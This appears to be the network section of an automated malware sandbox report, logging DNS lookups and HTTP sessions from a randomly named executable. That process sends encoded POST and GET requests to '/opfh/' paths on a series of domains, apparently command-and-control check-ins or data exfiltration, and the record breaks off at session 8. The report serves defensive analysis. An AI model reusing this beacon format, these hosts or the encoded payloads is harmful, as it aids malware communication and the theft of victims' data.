                            May 27, 2024 12:21:04.886538982 CEST1.1.1.1192.168.2.70x7d93No error (0)www.fruitique.co.uk212.227.172.253A (IP address)IN (0x0001)false
                            May 27, 2024 12:21:20.226238012 CEST1.1.1.1192.168.2.70xd48No error (0)www.gamemaster.at199.59.243.225A (IP address)IN (0x0001)false
                            May 27, 2024 12:21:34.980176926 CEST1.1.1.1192.168.2.70x74No error (0)www.annahaywardva.co.uk213.171.195.105A (IP address)IN (0x0001)false
                            May 27, 2024 12:21:48.718168974 CEST1.1.1.1192.168.2.70x47faNo error (0)www.ziontool.xyz203.161.43.227A (IP address)IN (0x0001)false
                            May 27, 2024 12:22:02.696774960 CEST1.1.1.1192.168.2.70x2727No error (0)www.busypro.net160.251.148.118A (IP address)IN (0x0001)false
                            May 27, 2024 12:22:16.349999905 CEST1.1.1.1192.168.2.70xf264No error (0)www.performacetoyota.ca199.59.243.225A (IP address)IN (0x0001)false
                            May 27, 2024 12:22:29.536874056 CEST1.1.1.1192.168.2.70xbb85Name error (3)www.digishieldu.onlinenonenoneA (IP address)IN (0x0001)false
                            May 27, 2024 12:22:39.030888081 CEST1.1.1.1192.168.2.70x1f5dNo error (0)www.pricekaboom.compricekaboom.comCNAME (Canonical name)IN (0x0001)false
                            May 27, 2024 12:22:39.030888081 CEST1.1.1.1192.168.2.70x1f5dNo error (0)pricekaboom.com185.31.240.240A (IP address)IN (0x0001)false
                            May 27, 2024 12:22:52.479981899 CEST1.1.1.1192.168.2.70x325eNo error (0)www.drapples.club94950.bodis.comCNAME (Canonical name)IN (0x0001)false
                            May 27, 2024 12:22:52.479981899 CEST1.1.1.1192.168.2.70x325eNo error (0)94950.bodis.com199.59.243.225A (IP address)IN (0x0001)false
                            May 27, 2024 12:23:06.040009975 CEST1.1.1.1192.168.2.70x1659No error (0)www.autonomyai.xyzautonomyai.xyzCNAME (Canonical name)IN (0x0001)false
                            May 27, 2024 12:23:06.040009975 CEST1.1.1.1192.168.2.70x1659No error (0)autonomyai.xyz3.33.130.190A (IP address)IN (0x0001)false
                            May 27, 2024 12:23:06.040009975 CEST1.1.1.1192.168.2.70x1659No error (0)autonomyai.xyz15.197.148.33A (IP address)IN (0x0001)false
                            May 27, 2024 12:23:20.167999983 CEST1.1.1.1192.168.2.70xd689No error (0)www.pharmacielorraine.fr91.195.240.92A (IP address)IN (0x0001)false
                            May 27, 2024 12:23:34.943599939 CEST1.1.1.1192.168.2.70x7b61No error (0)www.y94hr.topy94hr.topCNAME (Canonical name)IN (0x0001)false
                            May 27, 2024 12:23:34.943599939 CEST1.1.1.1192.168.2.70x7b61No error (0)y94hr.top38.47.207.149A (IP address)IN (0x0001)false
                            • www.batchscraper.com
                            • www.auronhouse.com
                            • www.ukscan.co.uk
                            • www.swordshoop.ca
                            • www.fruitique.co.uk
                            • www.gamemaster.at
                            • www.annahaywardva.co.uk
                            • www.ziontool.xyz
                            • www.busypro.net
                            • www.performacetoyota.ca
                            • www.pricekaboom.com
                            • www.drapples.club
                            • www.autonomyai.xyz
                            • www.pharmacielorraine.fr
                            • www.y94hr.top
                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            0192.168.2.763160172.67.190.203802780C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe
                            TimestampBytes transferredDirectionData
                            May 27, 2024 12:20:08.835238934 CEST460OUTGET /opfh/?R40L6=AGl44rzTw2dIC+2fJHSMY5CagqpMx9ss+xDw2ILHnY0V4XytCPUwKd/QF5kiL9X2gIgUWxZ6E+yGLjvXAstM4MAyIKs/O1HO2djzFZ+svgnMXhmr1Gwb4CXwLPvvhByMEXNfrkehm32q&b2PX=hZXl7VFPKl04 HTTP/1.1
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                            Accept-Language: en-US,en;q=0.5
                            Host: www.batchscraper.com
                            Connection: close
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                            May 27, 2024 12:20:09.468306065 CEST1236INHTTP/1.1 200 OK
                            Date: Mon, 27 May 2024 10:20:09 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: close
                            Vary: Accept-Encoding
                            Expires: Mon, 27 May 2024 11:20:09 GMT
                            Cache-Control: max-age=3600
                            Cache-Control: public
                            Pragma: public
                            Content-Security-Policy: default-src http: 'unsafe-inline' 'unsafe-eval'
                            X-Frame-Options: SAMEORIGIN
                            X-Xss-Protection: 1; mode=block
                            X-Content-Type-Options: nosniff
                            X-Request-Id: 214984b021942b0002f31025b82d1069
                            CF-Cache-Status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qYRjX8OMl3A6rTEnQ8bUtQQnWB4pQuRFAVKR06izzTSy7mrXn01KBU%2FEo6hA2gqLBalvw2Pmi5CRHc6%2BU95Vo5%2FlDHW3Xzy4c2u52qZ7HQia4BRYET5OEj%2Bt9Pr717xJnLSUc6qsfA%3D%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 88a5454dbf147cf6-EWR
                            alt-svc: h2=":443"; ma=60
                            Data Raw: 32 37 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 46 72 61 6d 65 73 65 74 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 66 72 61 6d 65 73 65 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 21 20 4d 61 6e 61 67 65 64 20 62 79 20 61 6e 73 69 62 6c 65 20 72 6f 6c 65 3a 20 69 6e 77 78 5f 69 6e 61 63 74 69 76 65 5f 64 6f 6d 61 69 6e 73 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61
                            Data Ascii: 276<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Frameset//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-frameset.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><! Managed by ansible role: inwx_inactive_domains ><head> <meta http-equiv="content-type" content="text/html; cha
                            May 27, 2024 12:20:09.468329906 CEST337INData Raw: 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 52 4f 42 4f 54 53 22 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 4e 4f 46 4f 4c 4c 4f 57 22 3e 0a 20 20 20 20 3c 74 69 74 6c
                            Data Ascii: rset=iso-8859-1" /> <meta name="ROBOTS" content="NOINDEX, NOFOLLOW"> <title>www.batchscraper.com has been registered</title></head><body><p align="center"><font face="Verdana, Arial, Helvetica, serif" size=2>www.batchscraper.co


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1192.168.2.763161142.250.186.51802780C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe
                            TimestampBytes transferredDirectionData
                            May 27, 2024 12:20:24.700797081 CEST717OUTPOST /opfh/ HTTP/1.1
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                            Accept-Language: en-US,en;q=0.5
                            Accept-Encoding: gzip, deflate
                            Host: www.auronhouse.com
                            Origin: http://www.auronhouse.com
                            Referer: http://www.auronhouse.com/opfh/
                            Cache-Control: max-age=0
                            Content-Length: 218
                            Content-Type: application/x-www-form-urlencoded
                            Connection: close
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                            Data Raw: 52 34 30 4c 36 3d 32 55 47 36 37 37 75 49 44 47 46 59 71 58 45 30 64 6d 35 39 2b 4c 45 42 64 72 43 6c 41 5a 4c 5a 39 35 56 52 69 30 55 68 4f 46 42 43 7a 76 6c 35 70 53 56 58 49 51 4a 2b 76 44 55 4d 32 4c 62 7a 61 5a 4d 64 44 66 4b 46 2f 4f 4a 38 6c 33 5a 69 55 49 66 56 31 6f 73 73 54 37 49 61 48 78 4f 4c 51 31 6d 57 6b 78 79 36 67 39 6b 72 75 49 44 39 5a 79 4f 65 52 72 2f 74 72 76 34 43 65 72 65 42 67 78 72 5a 68 74 72 38 49 55 43 2f 4f 35 58 35 6d 4d 51 33 53 67 59 58 6c 43 2b 31 36 6d 37 46 58 75 42 6a 7a 5a 6c 52 35 62 5a 31 70 36 45 56 74 62 45 35 74 78 38 79 6f 73 54 72 65 38 63 35 52 55 2f 6a 67 66 4e 50 43 34 78 33 44 46 66 69 57 41 3d 3d
                            Data Ascii: R40L6=2UG677uIDGFYqXE0dm59+LEBdrClAZLZ95VRi0UhOFBCzvl5pSVXIQJ+vDUM2LbzaZMdDfKF/OJ8l3ZiUIfV1ossT7IaHxOLQ1mWkxy6g9kruID9ZyOeRr/trv4CereBgxrZhtr8IUC/O5X5mMQ3SgYXlC+16m7FXuBjzZlR5bZ1p6EVtbE5tx8yosTre8c5RU/jgfNPC4x3DFfiWA==
                            May 27, 2024 12:20:25.357758999 CEST248INHTTP/1.1 302 Found
                            Location: https://www.auronhouse.com/opfh/
                            X-Cloud-Trace-Context: 7dc1c9f5998528f4ef7d210cf7b8a1a2
                            Date: Mon, 27 May 2024 10:20:25 GMT
                            Content-Type: text/html
                            Server: Google Frontend
                            Content-Length: 0
                            Connection: close


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2192.168.2.763162142.250.186.51802780C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe
                            TimestampBytes transferredDirectionData
                            May 27, 2024 12:20:27.241489887 CEST737OUTPOST /opfh/ HTTP/1.1
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                            Accept-Language: en-US,en;q=0.5
                            Accept-Encoding: gzip, deflate
                            Host: www.auronhouse.com
                            Origin: http://www.auronhouse.com
                            Referer: http://www.auronhouse.com/opfh/
                            Cache-Control: max-age=0
                            Content-Length: 238
                            Content-Type: application/x-www-form-urlencoded
                            Connection: close
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                            Data Raw: 52 34 30 4c 36 3d 32 55 47 36 37 37 75 49 44 47 46 59 73 32 30 30 66 46 52 39 32 4c 45 43 53 4c 43 6c 4b 35 4c 64 39 35 5a 52 69 33 5a 36 50 33 6c 43 30 4e 39 35 75 67 78 58 4c 51 4a 2b 6c 6a 55 4a 37 72 62 6b 61 5a 51 6a 44 61 79 46 2f 50 70 38 6c 32 70 69 55 62 33 57 30 34 73 75 62 62 49 69 66 52 4f 4c 51 31 6d 57 6b 77 43 45 67 35 41 72 75 35 7a 39 5a 58 75 64 4f 62 2f 71 38 66 34 43 61 72 65 46 67 78 71 4d 68 73 33 57 49 57 71 2f 4f 37 2f 35 6c 5a 77 77 4a 51 59 52 68 43 2f 41 2b 44 61 38 62 2b 35 58 38 4b 41 49 7a 36 42 75 68 73 5a 33 33 35 49 56 7a 67 45 4a 73 75 33 64 4a 61 42 4d 54 56 37 37 74 39 35 75 64 50 55 64 4f 58 2b 6d 41 37 67 4e 69 41 44 56 41 79 4f 32 39 4f 79 53 35 35 71 5a 59 4d 73 3d
                            Data Ascii: R40L6=2UG677uIDGFYs200fFR92LECSLClK5Ld95ZRi3Z6P3lC0N95ugxXLQJ+ljUJ7rbkaZQjDayF/Pp8l2piUb3W04subbIifROLQ1mWkwCEg5Aru5z9ZXudOb/q8f4CareFgxqMhs3WIWq/O7/5lZwwJQYRhC/A+Da8b+5X8KAIz6BuhsZ335IVzgEJsu3dJaBMTV77t95udPUdOX+mA7gNiADVAyO29OyS55qZYMs=
                            May 27, 2024 12:20:27.901139975 CEST248INHTTP/1.1 302 Found
                            Location: https://www.auronhouse.com/opfh/
                            X-Cloud-Trace-Context: 3f7bbcde1e52e3bf4d23e291aa864203
                            Date: Mon, 27 May 2024 10:20:27 GMT
                            Content-Type: text/html
                            Server: Google Frontend
                            Content-Length: 0
                            Connection: close


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            3192.168.2.763163142.250.186.51802780C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe
                            TimestampBytes transferredDirectionData
                            May 27, 2024 12:20:29.784356117 CEST1750OUTPOST /opfh/ HTTP/1.1
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                            Accept-Language: en-US,en;q=0.5
                            Accept-Encoding: gzip, deflate
                            Host: www.auronhouse.com
                            Origin: http://www.auronhouse.com
                            Referer: http://www.auronhouse.com/opfh/
                            Cache-Control: max-age=0
                            Content-Length: 1250
                            Content-Type: application/x-www-form-urlencoded
                            Connection: close
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                            Data Raw: 52 34 30 4c 36 3d 32 55 47 36 37 37 75 49 44 47 46 59 73 32 30 30 66 46 52 39 32 4c 45 43 53 4c 43 6c 4b 35 4c 64 39 35 5a 52 69 33 5a 36 50 33 74 43 30 38 64 35 74 42 78 58 4b 51 4a 2b 37 7a 55 49 37 72 62 6c 61 5a 49 6e 44 61 50 2b 2f 4b 74 38 6b 56 78 69 46 36 33 57 2f 34 73 75 5a 62 49 5a 48 78 4f 43 51 30 4b 61 6b 77 79 45 67 35 41 72 75 37 72 39 51 69 4f 64 49 62 2f 74 72 76 34 4f 65 72 66 61 67 78 79 63 68 73 6a 73 64 32 4b 2f 4f 62 50 35 32 61 59 77 55 67 59 54 73 69 2f 59 2b 44 65 64 62 2b 6c 71 38 4c 31 6e 7a 34 42 75 79 64 77 7a 68 39 51 2f 6c 57 49 48 6a 59 72 72 43 73 51 39 66 58 76 55 67 61 4e 4e 57 73 49 55 47 55 47 33 55 64 77 4b 79 6a 54 6f 4f 32 32 56 32 71 62 32 72 36 4c 62 5a 4d 53 6c 48 59 44 77 71 66 4d 79 56 5a 39 38 55 45 53 2f 4f 4d 32 33 47 4d 53 4a 54 71 69 45 67 2f 6c 33 39 55 6d 39 55 4d 30 70 38 46 76 51 56 4e 68 78 63 55 52 68 4e 38 6c 51 32 68 6d 69 65 62 30 69 78 6a 52 61 51 50 6d 33 70 2f 4e 2b 6d 4f 71 73 4c 50 67 45 5a 52 37 2f 42 54 41 44 45 68 51 52 41 74 67 76 [TRUNCATED]
                            Data Ascii: R40L6=2UG677uIDGFYs200fFR92LECSLClK5Ld95ZRi3Z6P3tC08d5tBxXKQJ+7zUI7rblaZInDaP+/Kt8kVxiF63W/4suZbIZHxOCQ0KakwyEg5Aru7r9QiOdIb/trv4Oerfagxychsjsd2K/ObP52aYwUgYTsi/Y+Dedb+lq8L1nz4Buydwzh9Q/lWIHjYrrCsQ9fXvUgaNNWsIUGUG3UdwKyjToO22V2qb2r6LbZMSlHYDwqfMyVZ98UES/OM23GMSJTqiEg/l39Um9UM0p8FvQVNhxcURhN8lQ2hmieb0ixjRaQPm3p/N+mOqsLPgEZR7/BTADEhQRAtgvl1uDFF7KR2nQDll6R3HDRW/0d9zcTCw/dsd9h1Gtco8mQXAFGWhJZDk8T5ww4ICvNIvJLOyv/WZTMePZ9IiCsCMapVF/pP8nTSIPDPwwX4y9HJlsmUR0BrG+3wyuVAAda5GFEQlxioentIw+QUE9RL56srB0UKmIIq9rsg4pjJ8sEXlJ5Wk5H5+zOFGqS8m1BuWdFivcDExlzXvAIk1e5GKmMwDCuHOE97hubqQJdyIXzVrXPVl4pcOkwOJ+kVGWSULLPimlQtt+AFc++Cu+JWZ85ZaTUOff42rsnfkjUmmIJQ4AXoLYycV/VE/eU4ecIleuAeZc7YeuD5c8WkwySqWLD04WOCaO+jsdnlZIcP8yy1Lz+PPlMwV0t6GMR2xZSJQ46DVLrB/tktoc0CO6py1e2LPmYQl3Y+uL7lT/ZOW/Oqn2vcxZIWBPHqdk4OmlATpQFwgk/vrGZ5YmjOMQnlXydE3VeNoeXQOYkQ0NPwE/6sckfH7fQfUB7+rlYx1vi3RWUPlMk/kcY8eRJbOEZU6ITXI4i/2oOJbjuy/3PPn5o4CwxI5LrgUEjpZWxC44b6TWINbVtcc1nWtT95qM/Jwwj1igPXvTsxnQ7AfCvlrxRbU4bUeq6TtVCd69jFvRidAS9zFLIbR+pbbXSBiDAYrlCaElWAnK8+ [TRUNCATED]
                            May 27, 2024 12:20:30.429518938 CEST248INHTTP/1.1 302 Found
                            Location: https://www.auronhouse.com/opfh/
                            X-Cloud-Trace-Context: 22763b0ba995d9ffb3f430f039f93bf7
                            Date: Mon, 27 May 2024 10:20:30 GMT
                            Content-Type: text/html
                            Server: Google Frontend
                            Content-Length: 0
                            Connection: close


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            4192.168.2.763164142.250.186.51802780C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe
                            TimestampBytes transferredDirectionData
                            May 27, 2024 12:20:32.726865053 CEST458OUTGET /opfh/?R40L6=7Wua4PKYKhchrV0dSktA0JoUSva1JJLdwMIZklFmHGZRtcxczCNUWysLgxYx/pnfXqYHMYy3waVzlkYFJZPX15RsNLA3Qz23CQiAilW87ptstt/8e1muReOX5esxW5+HpDKanOvxLVS9&b2PX=hZXl7VFPKl04 HTTP/1.1
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                            Accept-Language: en-US,en;q=0.5
                            Host: www.auronhouse.com
                            Connection: close
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                            May 27, 2024 12:20:33.376640081 CEST413INHTTP/1.1 302 Found
                            Location: https://www.auronhouse.com/opfh/?R40L6=7Wua4PKYKhchrV0dSktA0JoUSva1JJLdwMIZklFmHGZRtcxczCNUWysLgxYx/pnfXqYHMYy3waVzlkYFJZPX15RsNLA3Qz23CQiAilW87ptstt/8e1muReOX5esxW5+HpDKanOvxLVS9&b2PX=hZXl7VFPKl04
                            X-Cloud-Trace-Context: b08bad645b3fc7c7059802359242fa8a
                            Date: Mon, 27 May 2024 10:20:33 GMT
                            Content-Type: text/html
                            Server: Google Frontend
                            Content-Length: 0
                            Connection: close


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            5192.168.2.7631663.33.130.190802780C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe
                            TimestampBytes transferredDirectionData
                            May 27, 2024 12:20:38.430928946 CEST711OUTPOST /opfh/ HTTP/1.1
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                            Accept-Language: en-US,en;q=0.5
                            Accept-Encoding: gzip, deflate
                            Host: www.ukscan.co.uk
                            Origin: http://www.ukscan.co.uk
                            Referer: http://www.ukscan.co.uk/opfh/
                            Cache-Control: max-age=0
                            Content-Length: 218
                            Content-Type: application/x-www-form-urlencoded
                            Connection: close
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                            Data Raw: 52 34 30 4c 36 3d 6b 75 62 66 6d 6b 63 75 47 52 65 4e 54 4e 44 6b 55 78 64 44 48 64 69 30 72 4d 45 7a 4b 41 5a 4f 34 73 67 36 6d 48 71 30 4b 77 44 55 76 49 30 4d 33 67 2b 75 72 4d 4f 38 45 72 38 5a 65 50 76 77 37 54 32 7a 30 58 69 54 2f 52 4b 79 66 70 45 6a 66 59 68 6d 78 57 6d 46 70 7a 73 75 31 41 49 4a 75 44 69 72 44 55 35 54 32 38 70 75 6b 74 6a 67 70 44 47 4d 52 35 32 49 77 69 62 52 4b 65 78 69 46 61 6b 43 64 48 6c 42 78 6e 35 4b 78 70 4e 71 6a 6e 46 67 78 4d 45 51 39 65 6f 6d 53 76 78 49 56 74 44 47 63 6f 64 66 44 30 4d 6e 2f 79 71 55 54 62 41 42 72 54 7a 64 4f 35 4f 48 6a 4b 7a 49 35 64 71 44 4f 64 34 4e 6f 59 6b 47 2b 39 57 31 2f 67 3d 3d
                            Data Ascii: R40L6=kubfmkcuGReNTNDkUxdDHdi0rMEzKAZO4sg6mHq0KwDUvI0M3g+urMO8Er8ZePvw7T2z0XiT/RKyfpEjfYhmxWmFpzsu1AIJuDirDU5T28puktjgpDGMR52IwibRKexiFakCdHlBxn5KxpNqjnFgxMEQ9eomSvxIVtDGcodfD0Mn/yqUTbABrTzdO5OHjKzI5dqDOd4NoYkG+9W1/g==


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            6192.168.2.7631673.33.130.190802780C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe
                            TimestampBytes transferredDirectionData
                            May 27, 2024 12:20:40.980408907 CEST731OUTPOST /opfh/ HTTP/1.1
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                            Accept-Language: en-US,en;q=0.5
                            Accept-Encoding: gzip, deflate
                            Host: www.ukscan.co.uk
                            Origin: http://www.ukscan.co.uk
                            Referer: http://www.ukscan.co.uk/opfh/
                            Cache-Control: max-age=0
                            Content-Length: 238
                            Content-Type: application/x-www-form-urlencoded
                            Connection: close
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                            Data Raw: 52 34 30 4c 36 3d 6b 75 62 66 6d 6b 63 75 47 52 65 4e 42 39 54 6b 52 57 78 44 47 39 69 31 33 63 45 7a 41 67 5a 4b 34 73 38 36 6d 47 66 76 4c 47 72 55 75 74 49 4d 6d 55 69 75 75 4d 4f 38 4b 4c 38 63 52 76 76 46 37 54 72 4d 30 53 43 54 2f 52 75 79 66 74 4d 6a 66 76 39 6e 78 47 6d 62 77 6a 73 73 37 67 49 4a 75 44 69 72 44 56 4a 39 32 39 42 75 6b 64 7a 67 72 68 2b 50 4f 4a 32 4c 34 43 62 52 4f 65 78 75 46 61 6b 73 64 44 6c 6e 78 69 6c 4b 78 6f 39 71 6e 6a 5a 6a 2f 4d 45 4a 35 65 70 75 44 74 30 59 59 50 58 45 54 36 4a 72 48 6e 45 54 33 6b 33 32 4a 35 4d 74 31 43 4c 6d 4b 37 71 78 30 73 75 39 37 63 75 62 44 2f 4d 73 33 76 42 73 7a 76 33 78 70 54 61 6f 57 32 54 65 56 37 6b 51 65 33 62 69 36 59 35 59 6e 4a 59 3d
                            Data Ascii: R40L6=kubfmkcuGReNB9TkRWxDG9i13cEzAgZK4s86mGfvLGrUutIMmUiuuMO8KL8cRvvF7TrM0SCT/RuyftMjfv9nxGmbwjss7gIJuDirDVJ929Bukdzgrh+POJ2L4CbROexuFaksdDlnxilKxo9qnjZj/MEJ5epuDt0YYPXET6JrHnET3k32J5Mt1CLmK7qx0su97cubD/Ms3vBszv3xpTaoW2TeV7kQe3bi6Y5YnJY=


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            7192.168.2.7631683.33.130.190802780C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe
                            TimestampBytes transferredDirectionData
                            May 27, 2024 12:20:43.518188000 CEST1744OUTPOST /opfh/ HTTP/1.1
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                            Accept-Language: en-US,en;q=0.5
                            Accept-Encoding: gzip, deflate
                            Host: www.ukscan.co.uk
                            Origin: http://www.ukscan.co.uk
                            Referer: http://www.ukscan.co.uk/opfh/
                            Cache-Control: max-age=0
                            Content-Length: 1250
                            Content-Type: application/x-www-form-urlencoded
                            Connection: close
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                            Data Raw: 52 34 30 4c 36 3d 6b 75 62 66 6d 6b 63 75 47 52 65 4e 42 39 54 6b 52 57 78 44 47 39 69 31 33 63 45 7a 41 67 5a 4b 34 73 38 36 6d 47 66 76 4c 47 54 55 76 66 77 4d 33 46 69 75 74 4d 4f 38 43 72 38 64 52 76 76 69 37 54 7a 49 30 53 47 74 2f 54 6d 79 46 4b 4d 6a 5a 64 56 6e 6b 32 6d 62 74 7a 73 70 31 41 4a 4c 75 44 53 76 44 56 35 39 32 39 42 75 6b 62 66 67 76 7a 47 50 4d 4a 32 49 77 69 62 56 4b 65 77 78 46 61 38 61 64 44 6f 63 77 52 39 4b 77 49 74 71 68 47 46 6a 7a 4d 45 4c 2b 65 6f 6f 44 73 4a 43 59 50 4b 37 54 37 38 41 48 6b 6b 54 6e 46 47 41 55 39 34 56 73 43 54 65 42 70 79 52 31 66 61 68 30 38 32 62 4a 74 55 4e 33 66 64 55 77 4a 4f 78 74 30 6a 55 58 32 36 76 64 66 49 31 62 6a 4c 6d 68 6f 4e 6e 32 2b 36 4a 34 47 74 43 38 79 77 6b 39 32 69 70 6e 37 6d 41 4d 73 6a 34 50 63 55 67 33 50 33 37 35 35 78 63 66 38 49 58 70 56 30 42 61 53 44 67 63 44 31 6d 70 72 76 31 42 38 4a 56 52 39 2b 72 6e 47 64 39 58 56 41 37 74 65 66 2b 55 73 6a 41 59 65 66 39 34 6c 35 53 4a 58 2f 6d 59 56 53 54 49 6b 6c 30 33 68 2b 48 [TRUNCATED]
                            Data Ascii: R40L6=kubfmkcuGReNB9TkRWxDG9i13cEzAgZK4s86mGfvLGTUvfwM3FiutMO8Cr8dRvvi7TzI0SGt/TmyFKMjZdVnk2mbtzsp1AJLuDSvDV5929BukbfgvzGPMJ2IwibVKewxFa8adDocwR9KwItqhGFjzMEL+eooDsJCYPK7T78AHkkTnFGAU94VsCTeBpyR1fah082bJtUN3fdUwJOxt0jUX26vdfI1bjLmhoNn2+6J4GtC8ywk92ipn7mAMsj4PcUg3P3755xcf8IXpV0BaSDgcD1mprv1B8JVR9+rnGd9XVA7tef+UsjAYef94l5SJX/mYVSTIkl03h+HBVJBCLpGsgTRLEWeQ8t19gpN0zrpA1A3cG/QsvL9DgGaAeoWRxTJwlld0uEHLUlDNRT/F70xHles3LnkyvvuQbTi/OFVLgEPtNaPL6sOleDWuJgen9mFM/2QUTQLIhrhFlAAKFBzqz+hvuCeCKJGRFUoFp7j4GpEA22XQUZG+hsZCIzD5b2x1U3rVdzo3m2QDKP7YKI/ltwJgbb72/5M2zh00ahNFlVwv9egG8ScMxodIHp2FKDBAQr2V1pflBdHmA3s5KAVq87+vtOYWj1sJ+IksmtSwv562z3Ko4GoPDzgdRYACS37Erie8dn3ZmpuYInmlc0/QnAoqmmBSIwKDZFNIOSq9Yq3oPAg1Zcv5NVTZ95Yz7dSZULAlw0GDzRc8iP8u7ByMjLyhciCjld+LbNzMWiX8Ka2gJLh6KLu8op2XQixjZzt+YkpqJz7GIETaNP3DAXMVZpmL/g4bCBzuGN6OHPGCteaRtAkUqqfJYMYbfovsj+MuTf0e5X0LBeR/aEiz/1h68WgwQrPRCBWSxdVAeQSIu+zjO0we31XcCeWcof29EJLvcIKmrRyNzRAvB3rBMZ61Wiq0pXvZvs0PyZik0kFp3vxO+ITv+LOTtF6nnSQ4fxboeRysG05o5HfPIlcV/vPNpwbDDTnGp0FVrpzSImVoho3kB [TRUNCATED]


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            8192.168.2.7631693.33.130.190802780C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe
